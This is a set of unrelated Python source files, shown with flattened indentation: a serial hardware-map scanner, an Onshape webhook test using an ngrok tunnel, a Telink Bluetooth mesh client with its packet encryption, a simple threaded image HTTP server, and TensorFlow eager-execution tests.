from serial.tools import list_ports
if persistent and platform.system() == 'Linux':
# On Linux, /dev/serial/by-id provides symlinks to
# '/dev/ttyACMx' nodes using names which are unique as
# long as manufacturers fill out USB metadata nicely.
#
# This creates a map from '/dev/ttyACMx' device nodes
# to '/dev/serial/by-id/usb-...' symlinks. The symlinks
# go into the hardware map because they stay the same
# even when the user unplugs / replugs the device.
#
# Some inexpensive USB/serial adapters don't result
# in unique names here, though, so use of this feature
# requires explicitly setting persistent=True.
by_id = Path('/dev/serial/by-id')
def readlink(link):
return str((by_id / link).resolve())
persistent_map = {readlink(link): str(link)
for link in by_id.iterdir()}
else:
persistent_map = {}
serial_devices = list_ports.comports()
logger.info("Scanning connected hardware...")
for d in serial_devices:
if d.manufacturer in self.manufacturer:
# TI XDS110 can have multiple serial devices for a single board
# assume endpoint 0 is the serial, skip all others
if d.manufacturer == 'Texas Instruments' and not d.location.endswith('0'):
continue
s_dev = {}
s_dev['platform'] = "unknown"
s_dev['id'] = d.serial_number
s_dev['serial'] = persistent_map.get(d.device, d.device)
s_dev['product'] = d.product
s_dev['runner'] = 'unknown'
for runner, products in self.runner_mapping.items():
if d.product in products:
s_dev['runner'] = runner
continue
# Try regex matching
for p in products:
if re.match(p, d.product):
s_dev['runner'] = runner
s_dev['available'] = True
s_dev['connected'] = True
self.detected.append(s_dev)
else:
logger.warning("Unsupported device (%s): %s" % (d.manufacturer, d))
def write_map(self, hwm_file):
# use existing map
if os.path.exists(hwm_file):
with open(hwm_file, 'r') as yaml_file:
hwm = yaml.load(yaml_file, Loader=SafeLoader)
hwm.sort(key=lambda x: x['serial'] or '')
# disconnect everything
for h in hwm:
h['connected'] = False
h['serial'] = None
self.detected.sort(key=lambda x: x['serial'] or '')
for d in self.detected:
for h in hwm:
if d['id'] == h['id'] and d['product'] == h['product'] and not h['connected'] and not d.get('match', False):
h['connected'] = True
h['serial'] = d['serial']
d['match'] = True
new = list(filter(lambda n: not n.get('match', False), self.detected))
hwm = hwm + new
logger.info("Registered devices:")
self.dump(hwm)
with open(hwm_file, 'w') as yaml_file:
yaml.dump(hwm, yaml_file, Dumper=Dumper, default_flow_style=False)
else:
# create new file
with open(hwm_file, 'w') as yaml_file:
yaml.dump(self.detected, yaml_file, Dumper=Dumper, default_flow_style=False)
logger.info("Detected devices:")
self.dump(self.detected)
@staticmethod
def dump(hwmap=[], filtered=[], header=[], connected_only=False):
print("")
table = []
if not header:
header = ["Platform", "ID", "Serial device"]
for p in sorted(hwmap, key=lambda i: i['platform']):
platform = p.get('platform')
connected = p.get('connected', False)
if filtered and platform not in filtered:
continue
if not connected_only or connected:
table.append([platform, p.get('id', None), p.get('serial')])
print(tabulate(table, headers=header, tablefmt="github"))
def size_report(sc):
logger.info(sc.filename)
logger.info("SECTION NAME VMA LMA SIZE HEX SZ TYPE")
for i in range(len(sc.sections)):
v = sc.sections[i]
logger.info("%-17s 0x%08x 0x%08x %8d 0x%05x %-7s" %
(v["name"], v["virt_addr"], v["load_addr"], v["size"], v["size"],
v["type"]))
logger.info("Totals: %d bytes (ROM), %d bytes (RAM)" %
(sc.rom_size, sc.ram_size))
logger.info("")
def export_tests(filename, tests):
with open(filename, "wt") as csvfile:
fieldnames = ['section', 'subsection', 'title', 'reference']
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
for test in tests:
data = test.split(".")
if len(data) > 1:
subsec = " ".join(data[1].split("_")).title()
rowdict = {
"section": data[0].capitalize(),
"subsection": subsec,
"title": test,
"reference": test
}
cw.writerow(rowdict)
else:
logger.info("{} can't be exported".format(test))
|
test_webhooks.py
|
import pytest
import socket
from requests import get
from pyngrok import ngrok
import webbrowser
from typing import Callable
from http.server import BaseHTTPRequestHandler, HTTPServer
from threading import Thread
import six
import json
import time
import queue
from onshape_client.oas import (
BTWebhookParams,
BTWebhookOptions,
BTTranslateFormatParams,
)
from onshape_client.onshape_url import OnshapeElement
from contextlib import closing
@pytest.fixture
def free_port():
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
# SO_REUSEADDR must be set before bind() for it to take effect
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(("", 0))
return s.getsockname()[1]
def tunnel(port):
"""Open a tunnel and return the public URL."""
url = ngrok.connect(port=port)
return url
@pytest.fixture
def webhook_server_factory(free_port):
"""For making a server that can accept Onshape webhooks."""
servers = []
threads = []
def _webhook_server_factory():
""" Create a factory to handle webhook notifications coming in.
:param on_recieved: function callback to handle the json response from the webhook.
:return: HTTPServer: server
"""
class myHandler(BaseHTTPRequestHandler):
def __init__(self, request, client_address, server):
# Holds an optional callback for processing the request; currently unused.
self.on_received = None
# BaseHTTPRequestHandler handles the request inside __init__, so set attributes first.
super().__init__(request, client_address, server)
def do_POST(self):
content_length = int(self.headers["Content-Length"])
body = self.rfile.read(content_length)
unquoted_s = body.decode("utf-8")
data = json.loads(unquoted_s)
server._message_q.put(data)
# Always return a 200 response to acknowledge receipt
self.send_response(200)
self.end_headers()
def do_GET(self):
raise NotImplementedError()
class WebhookServer(HTTPServer):
def __init__(
self, server_address, RequestHandlerClass, bind_and_activate=True
):
super().__init__(server_address, RequestHandlerClass, bind_and_activate)
self._tunneled_url = None
# Used to communicate to the main thread that a message has been received and needs to be processed.
# The main thread is responsible for popping messages off as they are processed.
self._message_q = queue.Queue()
@property
def url(self):
return f"http://localhost:{self.server_port}"
@property
def tunneled_url(self):
if not self._tunneled_url:
self._tunneled_url = tunnel(self.server_port)
return self._tunneled_url
def wait_for_message(
self, message_predicate=lambda m: True, seconds_to_wait=5
):
""" Block progress until a certain message is received that satisfies the passed message_predicate
:param message_predicate: blocking function that takes the message and returns True
if it is the 'right one'.
:param seconds_to_wait: seconds to wait for the message. This will throw a StopIteration
if the time runs out without a valid message.
"""
start_time = time.time()
poll_time = seconds_to_wait / 100
while True:
try:
message = self._message_q.get(timeout=poll_time)
if message_predicate(message):
return
self._message_q.task_done()
except queue.Empty:
pass
if time.time() - start_time > seconds_to_wait:
raise TimeoutError()
server = WebhookServer(("localhost", free_port), myHandler)
servers.append(server)
thread = Thread(target=server.serve_forever)
thread.start()
threads.append(thread)
return server
yield _webhook_server_factory
for server, thread in zip(servers, threads):
server.shutdown()
thread.join()
def test_create_version_with_webhook(client, webhook_server_factory, new_document):
server = webhook_server_factory()
params = BTWebhookParams(
events=["onshape.model.lifecycle.createversion",],
url=server.tunneled_url,
options=BTWebhookOptions(collapse_events=False),
document_id=new_document.did,
)
client.webhooks_api.create_webhook(bt_webhook_params=params, _preload_content=False)
server.wait_for_message(
lambda m: m["event"] == "webhook.register", seconds_to_wait=30
)
new_document.make_version("new version!")
server.wait_for_message(
lambda m: m["event"] == "onshape.model.lifecycle.createversion",
seconds_to_wait=30,
)
|
telink.py
|
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Contains code derived from python-tikteck,
# Copyright 2016 Matthew Garrett <mjg59@srcf.ucam.org>
import random
import threading
import time
import binascii
import gatt
from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes
def hex_to_str(hex_str):
return str(bytearray([int(n, 16) for n in hex_str]))
def encrypt(key, data):
k = AES.new(bytes(reversed(key)), AES.MODE_ECB)
data = reversed(list(k.encrypt(bytes(reversed(data)))))
rev = []
for d in data:
rev.append(d)
return rev
def generate_sk(name, password, data1, data2):
name = name.ljust(16, chr(0))
password = password.ljust(16, chr(0))
key = [ord(a) ^ ord(b) for a,b in zip(name,password)]
data = data1[0:8]
data += data2[0:8]
return encrypt(key, data)
def key_encrypt(name, password, key):
name = name.ljust(16, chr(0))
password = password.ljust(16, chr(0))
data = [ord(a) ^ ord(b) for a,b in zip(name,password)]
return encrypt(key, data)
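# Pairing-flow sketch (inferred from telink.connect() below): the client writes 8 random
# bytes plus key_encrypt(name, password, data) to the pairing characteristic (UUID ending
# in 1914); the device answers with its own random bytes, and both sides derive the
# session key via generate_sk(name, password, client_random, device_random).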
def encrypt_packet(sk, address, packet):
# print("Debug: Encrypting from ", sk, address, binascii.hexlify(bytearray(packet)))
auth_nonce = [address[0], address[1], address[2], address[3], 0x01, packet[0], packet[1], packet[2], 15, 0, 0, 0, 0, 0, 0, 0]
authenticator = encrypt(sk, auth_nonce)
for i in range(15):
authenticator[i] = authenticator[i] ^ packet[i+5]
mac = encrypt(sk, authenticator)
for i in range(2):
packet[i+3] = mac[i]
iv = [0, address[0], address[1], address[2], address[3], 0x01, packet[0], packet[1], packet[2], 0, 0, 0, 0, 0, 0, 0]
temp_buffer = encrypt(sk, iv)
for i in range(15):
packet[i+5] ^= temp_buffer[i]
# print("Debug: Encrypted ", binascii.hexlify(bytearray(packet)))
return packet
def decrypt_packet(sk, address, packet):
# print("Debug: decrypting from ", sk, address, packet, type(packet))
iv = [address[0], address[1], address[2], packet[0], packet[1], packet[2],
packet[3], packet[4], 0, 0, 0, 0, 0, 0, 0, 0]
plaintext = [0] + iv[0:15]
result = encrypt(sk, plaintext)
for i in range(len(packet)-7):
packet[i+7] ^= result[i]
# print("Debug: Decrypted ", binascii.hexlify(bytearray(packet)))
return packet
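# Usage note: outgoing mesh commands are framed by telink.send_packet() below and run through
# encrypt_packet(); incoming notifications on the characteristic ending in 1911 are run through
# decrypt_packet() in Peripheral.characteristic_value_updated().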
class TelinkDeviceManager(gatt.DeviceManager):
def device_discovered(self, device):
pass
# print("Discovered [%s] %s" % (device.mac_address, device.alias()))
class Peripheral(gatt.Device):
serviceResolved = False
link = None
callback = None
c_values = {}
def connect_succeeded(self):
super().connect_succeeded()
        #self.serviceResolved = True  # TODO: services may not need to be resolved here
# print("[%s] Connected" % (self.mac_address))
def connect_failed(self, error):
super().connect_failed(error)
# print("[%s] Connection failed: %s" % (self.mac_address, str(error)))
def disconnect_succeeded(self):
super().disconnect_succeeded()
# print("[%s] Disconnected" % (self.mac_address))
def services_resolved(self):
super().services_resolved()
self.serviceResolved = True
# self.connectedCallback()
def setNotificationCallback(self, link, callback):
self.link = link
self.callback = callback
def getValue(self, characteristic):
c_uuid = str(characteristic.uuid)
value = self.c_values.get(c_uuid)
return value
def characteristic_value_updated(self, characteristic, value):
value = list(value)
c_uuid = str(characteristic.uuid)
self.c_values[c_uuid] = value
# print("Debug: Characteristic %s value update %s" % (characteristic.uuid, binascii.hexlify(bytearray(self.c_values.get(c_uuid)))))
if c_uuid == '00010203-0405-0607-0809-0a0b0c0d1911':
# print("Debug: received notication from 1911 with ", binascii.hexlify(bytearray(value)))
if self.link is not None:
# print("Debug: callback exists, decrypting received value from 1911")
decrypted = decrypt_packet(self.link.sk, self.link.macdata, value)
self.callback(self.link.mesh, decrypted)
def getCharacteristics(self, characteristic_uuid):
for s in self.services:
for c in s.characteristics:
# print("Debug: Matching characteristic %s to %s" % (c.uuid, characteristic_uuid))
if c.uuid == characteristic_uuid:
# print("Debug: Found matched charateristic ", characteristic_uuid)
return c
class telink:
def __init__(self, vendor, mac, name, password, mesh=None, callback=None):
self.vendor = vendor
self.mac = mac
if (mac is not None):
self.macarray = mac.split(':')
self.macdata = [int(self.macarray[5], 16), int(self.macarray[4], 16), int(self.macarray[3], 16), int(self.macarray[2], 16), int(self.macarray[1], 16), int(self.macarray[0], 16)]
self.name = name
self.password = password
self.callback = callback
self.mesh = mesh
self.packet_count = random.randrange(0xffff)
self.scanned = False
self.manager = TelinkDeviceManager(adapter_name='hci0')
self.manager.is_adapter_powered = True
thread = threading.Thread(target=self.startManager)
thread.daemon = True
thread.start()
def startManager(self):
if (self.manager is None):
print("Error: Device manager not defined!")
else:
# print("Debug: Thread starting manager")
self.manager.run()
def stopManager(self):
if (self.manager is None):
print("Error: Device manager not defined!")
else:
# print("Debug: Thread stopping manager")
self.manager.stop()
def set_sk(self, sk):
self.sk = sk
def registerConnectableDevices(self, scanTime = 10):
# print("Debug: registering devices")
self.manager.start_discovery()
time.sleep(scanTime)
self.manager.stop_discovery()
self.devices = self.manager.devices()
self.scanned = True
def disconnect(self):
if (self.mac is not None):
self.device.disconnect()
def connect(self, mac):
self.mac = mac
self.macarray = mac.split(':')
self.macdata = [int(self.macarray[5], 16), int(self.macarray[4], 16), int(self.macarray[3], 16), int(self.macarray[2], 16), int(self.macarray[1], 16), int(self.macarray[0], 16)]
# print("Debug: connecting to %s" % self.mac)
if (not self.scanned):
# print("Debug: no device have registered")
self.registerConnectableDevices()
lt = time.monotonic()
while (time.monotonic() - lt < 15):
time.sleep(0.5)
if (self.scanned):
break
if (self.scanned):
self.device = Peripheral(mac_address = self.mac, manager = self.manager)
# self.device.setConnectedCallback(callback = onConnected)
self.device.connect()
# print("Debug: waiting for service to resolve")
lt = time.monotonic()
while (time.monotonic() - lt < 5):
time.sleep(0.2)
if (self.device.serviceResolved):
break
if (self.device.serviceResolved):
# def onConnected(self):
# print("Debug: all services resolved")
self.notification = self.device.getCharacteristics("00010203-0405-0607-0809-0a0b0c0d1911")
if self.notification:
self.notification.enable_notifications()
else:
print("Exception: device has no notification")
return None
self.control = self.device.getCharacteristics("00010203-0405-0607-0809-0a0b0c0d1912")
self.pairing = self.device.getCharacteristics("00010203-0405-0607-0809-0a0b0c0d1914")
data = [0] * 16
random_data = get_random_bytes(8)
for i in range(8):
data[i] = random_data[i]
enc_data = key_encrypt(self.name, self.password, data)
packet = [0x0c]
packet += data[0:8]
packet += enc_data[0:8]
self.pairing.write_value(bytes(packet))
time.sleep(1)
self.pairing.c_value = None
lt = time.monotonic()
data2 = None
self.pairing.read_value()
while time.monotonic() - lt < 5 and data2 is None:
data2 = self.device.getValue(self.pairing)
time.sleep(0.1)
if data2 is None:
print("Exception: unable to connect")
return None
self.sk = generate_sk(self.name, self.password, data[0:8], data2[1:9])
# print("Debug: sk, mac, macdata: ", self.sk, self.mac, self.macdata)
if self.callback is not None:
# print("Debug: setting notification call back")
self.device.setNotificationCallback(self, self.callback)
self.notification.write_value(bytes([0x1]))
else:
print("Warning: no service resolved for %s" % self.device.alias())
return self.device
else:
print("Error: scanning failed, check BT hardware!")
return None
def send_packet(self, target, command, data):
packet = [0] * 20
packet[0] = self.packet_count & 0xff
packet[1] = self.packet_count >> 8 & 0xff
packet[5] = target & 0xff
packet[6] = (target >> 8) & 0xff
packet[7] = command
packet[8] = self.vendor & 0xff
packet[9] = (self.vendor >> 8) & 0xff
for i in range(len(data)):
packet[10 + i] = data[i]
# print("send_packet verify plain: ", binascii.hexlify(bytearray(bytes(packet))))
enc_packet = encrypt_packet(self.sk, self.macdata, packet)
# print("send_packet verify encrypted: ", binascii.hexlify(bytearray(bytes(enc_packet))))
self.packet_count += 1
if self.packet_count > 65535:
self.packet_count = 1
# BLE connections may not be stable. Spend up to 10 seconds trying to
# reconnect before giving up.
initial = time.monotonic()
while True:
if time.monotonic() - initial >= 10:
# raise Exception("Unable to connect")
print("Write failed")
break
try:
self.control.write_value(bytes(enc_packet))
break
            except Exception:
                # Reconnect and retry the write; connect() requires the MAC address.
                self.connect(self.mac)
|
bucketserver.py
|
# -*- coding: utf-8 -*-
"""
bucketserver
Simple web service for image
Copyright (c) 2017 - RocketRedNeck.com RocketRedNeck.net
RocketRedNeck and MIT Licenses
RocketRedNeck hereby grants license for others to copy and modify this source code for
whatever purpose others deem worthy, as long as RocketRedNeck is given credit where
credit is due and you leave RocketRedNeck out of it for all other nefarious purposes.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
****************************************************************************************************
"""
# import the necessary packages
import cv2
try:
    from http.server import BaseHTTPRequestHandler, HTTPServer  # Python 3
except ImportError:
    from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer  # Python 2
from threading import Thread
class BucketServer:
def __init__(self,name,httpserver):
        self.name = name
        self.server = httpserver
        print("Creating BucketServer for " + self.name)
# initialize the variable used to indicate if the thread should
# be stopped
self._stop = False
self.stopped = True
print("BucketServerImageProcessor created for " + self.name)
def start(self):
print("STARTING BucketServer for " + self.name)
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
return self
def update(self):
print("BuckerServer for " + self.name + " RUNNING")
self.stopped = False
self.server.serve_forever() # Until shutdown is commanded
self._stop = False
self.stopped = True
print("BucketServer for " + self.name + " STOPPING")
def stop(self):
# indicate that the thread should be stopped
self._stop = True
self.server.shutdown()
def isStopped(self):
return self.stopped
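# Minimal usage sketch (SomeImageHandler is a hypothetical request handler, not part of this module):
#   server = HTTPServer(('0.0.0.0', 8080), SomeImageHandler)
#   bucket = BucketServer('camera', server).start()   # serves in a daemon thread
#   ...
#   bucket.stop()                                     # calls server.shutdown(), so update() returns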
|
core_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for core."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import pickle
import threading
import numpy as np
from tensorflow.core.protobuf import config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.compat import compat
from tensorflow.python.eager import context
from tensorflow.python.eager import core
from tensorflow.python.eager import def_function
from tensorflow.python.eager import execute as execute_lib
from tensorflow.python.eager import executor
from tensorflow.python.eager import test
from tensorflow.python.framework import config
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_resource_variable_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import variables
def execute(op_name, num_outputs, inputs, attrs=None):
return execute_lib.execute(
op_name, num_outputs, inputs, attrs, context.context())
def truncated_normal(shape):
return execute(
b'TruncatedNormal',
1,
inputs=[shape],
attrs=('dtype', dtypes.float32.as_datatype_enum, 'T',
shape.dtype.as_datatype_enum, 'seed', 0, 'seed2', 0))[0]
def current_device():
return constant_op.constant(1.).device
def configure_virtual_cpus():
cpus = config.list_physical_devices('CPU')
# Set 2 virtual CPUs
config.set_virtual_device_configuration(cpus[0], [
context.VirtualDeviceConfiguration(),
context.VirtualDeviceConfiguration()
])
class TFETest(test_util.TensorFlowTestCase):
def setUp(self):
super(TFETest, self).setUp()
configure_virtual_cpus()
def _test_hashable(self, a, b, hashable):
if hashable:
self.assertIsInstance(b, collections.Hashable)
self.assertLen(set([a, b]), 2)
else:
# TODO(gjn): Figure out how to make this work for tf.Tensor
# self.assertNotIsInstance(b, collections.Hashable)
with self.assertRaisesRegexp(TypeError, 'unhashable'):
set([a, b])
def testEquality(self):
default = ops.Tensor._USE_EQUALITY
try:
def _v1_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, 1.0)
self.assertIsNot(a, 1.0)
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
def _v2_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertEqual(a, 1.0)
self.assertIsNot(a, 1.0)
self.assertEqual(a, b)
self.assertIsNot(a, b)
constant_a = constant_op.constant(1.0)
constant_b = constant_op.constant(1.0)
ops.disable_tensor_equality()
self._test_hashable(constant_a, constant_b, True)
_v1_check(constant_a, constant_b)
ops.enable_tensor_equality()
_v2_check(constant_a, constant_b)
self._test_hashable(constant_a, constant_b, False)
variable_a = variables.Variable(1.0)
variable_b = variables.Variable(1.0)
ops.disable_tensor_equality()
_v1_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, True)
ops.enable_tensor_equality()
_v2_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, False)
# We only test numpy behaviour in v2 mode since we'd like to match that.
numpy_a = np.array(1.0)
numpy_b = np.array(1.0)
_v2_check(numpy_a, numpy_b)
self._test_hashable(numpy_a, numpy_b, False)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testEqualityNan(self):
default = ops.Tensor._USE_EQUALITY
try:
def _v1_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, float('nan'))
self.assertIsNot(a, float('nan'))
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
def _v2_check(a, b):
self.assertNotEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, float('nan'))
self.assertIsNot(a, float('nan'))
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
constant_a = constant_op.constant(float('nan'))
constant_b = constant_op.constant(float('nan'))
ops.disable_tensor_equality()
self._test_hashable(constant_a, constant_b, True)
_v1_check(constant_a, constant_b)
ops.enable_tensor_equality()
_v2_check(constant_a, constant_b)
self._test_hashable(constant_a, constant_b, False)
variable_a = variables.Variable(float('nan'))
variable_b = variables.Variable(float('nan'))
ops.disable_tensor_equality()
_v1_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, True)
ops.enable_tensor_equality()
_v2_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, False)
numpy_a = np.array(float('nan'))
numpy_b = np.array(float('nan'))
_v2_check(numpy_a, numpy_b)
self._test_hashable(numpy_a, numpy_b, False)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testEqualityCompare(self):
default = ops.Tensor._USE_EQUALITY
try:
tf_a = constant_op.constant([1, 2])
tf_b = constant_op.constant([1, 2])
tf_c = constant_op.constant([1, 1])
np_a = np.array([1, 2])
np_b = np.array([1, 2])
np_c = np.array([1, 1])
ops.disable_tensor_equality()
# We don't do element-wise comparison
self.assertNotEqual(tf_a, tf_b)
self.assertNotEqual(tf_a, tf_c)
# We can compare list of tensors
self.assertEqual([tf_a, tf_b], [tf_a, tf_b])
self.assertNotEqual([tf_a, tf_b], [tf_b, tf_b])
# We can compare existence in a list
self.assertIn(tf_a, [tf_a, tf_b])
self.assertIn(tf_a, [tf_b, tf_a])
self.assertNotIn(tf_a, [tf_b, tf_c])
ops.enable_tensor_equality()
# We do element-wise comparison but can't convert results array to bool
with self.assertRaises(ValueError):
bool(tf_a == tf_b)
self.assertAllEqual(tf_a == tf_b, [True, True])
with self.assertRaises(ValueError):
bool(tf_a == tf_c)
self.assertAllEqual(tf_a == tf_c, [True, False])
self.assertNotAllEqual(tf_a, tf_c)
with self.assertRaises(ValueError):
bool(np_a == np_b)
self.assertAllEqual(np_a == np_b, [True, True])
with self.assertRaises(ValueError):
bool(np_a == np_c)
self.assertAllEqual(np_a == np_c, [True, False])
self.assertNotAllEqual(np_a, np_c)
      # Warning: even though we technically shouldn't be able to compare here,
      # since the ids are the same both TF & numpy will handle lists with the
      # same values without raising an error.
self.assertEqual([tf_a, tf_b], [tf_a, tf_b])
with self.assertRaises(ValueError):
bool([tf_a, tf_b] == [tf_b, tf_b])
self.assertEqual([np_a, np_b], [np_a, np_b])
with self.assertRaises(ValueError):
bool([np_a, np_b] == [np_b, np_b])
      # Similar to lists, we shouldn't be able to do an `in` check such as
# `if a in [a,b]`. However if `a` is the first element, it works due to
# short circuiting
self.assertIn(tf_a, [tf_a, tf_b])
with self.assertRaises(ValueError):
bool(tf_a in [tf_b, tf_a])
with self.assertRaises(ValueError):
bool(tf_a in [tf_b, tf_c])
self.assertIn(np_a, [np_a, np_b])
with self.assertRaises(ValueError):
bool(np_a in [np_b, np_a])
with self.assertRaises(ValueError):
bool(np_a in [np_b, np_c])
# rank 0
self.assertAllEqual(
constant_op.constant(1) == constant_op.constant(1), True)
self.assertAllEqual(
constant_op.constant(1) == constant_op.constant(2), False)
self.assertAllEqual(np.array(1) == np.array(1), True)
self.assertAllEqual(np.array(1) == np.array(2), False)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testEqualityBroadcast(self):
default = ops.Tensor._USE_EQUALITY
try:
tf_a = constant_op.constant([1, 1])
tf_b = constant_op.constant([1, 1])
tf_c = constant_op.constant([[1, 1], [1, 1]])
tf_d = constant_op.constant([[1, 2], [1, 2]])
tf_e = constant_op.constant([1, 1, 1])
np_a = np.array([1, 1])
np_b = np.array([1, 1])
np_c = np.array([[1, 1], [1, 1]])
np_d = np.array([[1, 2], [1, 2]])
np_e = np.array([1, 1, 1])
ops.disable_tensor_equality()
# We don't do element-wise comparison
self.assertNotEqual(tf_a, tf_b)
self.assertNotEqual(tf_a, tf_c)
self.assertNotEqual(tf_a, tf_d)
ops.enable_tensor_equality()
# We do element-wise comparison but can't convert results array to bool
with self.assertRaises(ValueError):
bool(tf_a == tf_b)
self.assertAllEqual(tf_a == tf_b, [True, True])
with self.assertRaises(ValueError):
bool(tf_a == tf_c)
self.assertAllEqual(tf_a == tf_c, [[True, True], [True, True]])
with self.assertRaises(ValueError):
bool(tf_a == tf_d)
self.assertAllEqual(tf_a == tf_d, [[True, False], [True, False]])
if compat.forward_compatible(2019, 9, 25):
self.assertFalse(bool(tf_a == tf_e))
self.assertTrue(bool(tf_a != tf_e))
self.assertNotAllEqual(tf_a, tf_e)
else:
with self.assertRaises(errors.InvalidArgumentError):
bool(tf_a != tf_e)
with self.assertRaises(ValueError):
bool(np_a == np_b)
self.assertAllEqual(np_a == np_b, [True, True])
with self.assertRaises(ValueError):
bool(np_a == np_c)
self.assertAllEqual(np_a == np_c, [[True, True], [True, True]])
self.assertAllEqual(np_a == np_d, [[True, False], [True, False]])
self.assertFalse(bool(np_a == np_e))
self.assertTrue(bool(np_a != np_e))
self.assertNotAllEqual(np_a, np_e)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testContext(self):
ctx = context.Context()
self.assertTrue(ctx.executing_eagerly())
self.assertEqual('', ctx.scope_name)
ctx.scope_name = 'foo'
self.assertEqual('foo', ctx.scope_name)
self.assertEqual(context.SYNC, ctx.execution_mode)
ctx.execution_mode = context.ASYNC
self.assertEqual(context.ASYNC, ctx.execution_mode)
ctx.execution_mode = context.SYNC
self.assertEqual(context.SYNC, ctx.execution_mode)
self.assertIsNone(ctx.summary_writer)
ctx.summary_writer = 'mock'
self.assertEqual('mock', ctx.summary_writer)
self.assertIsNone(ctx.summary_recording)
ctx.summary_recording = 'mock'
self.assertEqual('mock', ctx.summary_recording)
self.assertIsNone(ctx.summary_step)
ctx.summary_step = 'mock'
self.assertEqual('mock', ctx.summary_step)
self.assertEqual('', ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device('GPU:0'):
self.assertEqual('/job:localhost/replica:0/task:0/device:GPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device(None):
self.assertEqual('', ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device('CPU:0'):
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
has_cpu_device = False
for x in ctx.devices():
has_cpu_device = has_cpu_device or 'CPU' in x
self.assertTrue(has_cpu_device)
del ctx
def testAsyncBasic(self):
ctx = context.Context(execution_mode=context.ASYNC)
ctx.ensure_initialized()
has_cpu_device = False
for x in ctx.devices():
has_cpu_device = has_cpu_device or 'CPU' in x
self.assertTrue(has_cpu_device)
del ctx
def testRunMetadata(self):
context.enable_run_metadata()
t = constant_op.constant(1.0)
_ = t + t # Runs an operation which will be in the RunMetadata
run_metadata = context.export_run_metadata()
context.disable_run_metadata()
step_stats = run_metadata.step_stats
self.assertGreater(len(step_stats.dev_stats), 0)
cpu_stats = step_stats.dev_stats[0]
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
cpu_stats.device)
self.assertGreaterEqual(len(cpu_stats.node_stats), 1)
def testMultiCpuPlacement(self):
with ops.device('cpu:1'):
x = constant_op.constant(1.0)
y = array_ops.identity(x)
self.assertEqual(x.device, '/job:localhost/replica:0/task:0/device:CPU:1')
self.assertEqual(y.device, '/job:localhost/replica:0/task:0/device:CPU:0')
@test_util.run_gpu_only
def testShouldCopy(self):
with ops.device('gpu:0'):
x = constant_op.constant(1.0)
y = array_ops.identity(x)
# The value we're testing y.device against will depend on what the behavior
# of not explicitly specifying a device in the context is. This behavior is
# subject to change (for example, in the future we may want to use GPUs, if
# available, when no device is explicitly provided)
self.assertEqual(y.device, '/job:localhost/replica:0/task:0/device:CPU:0')
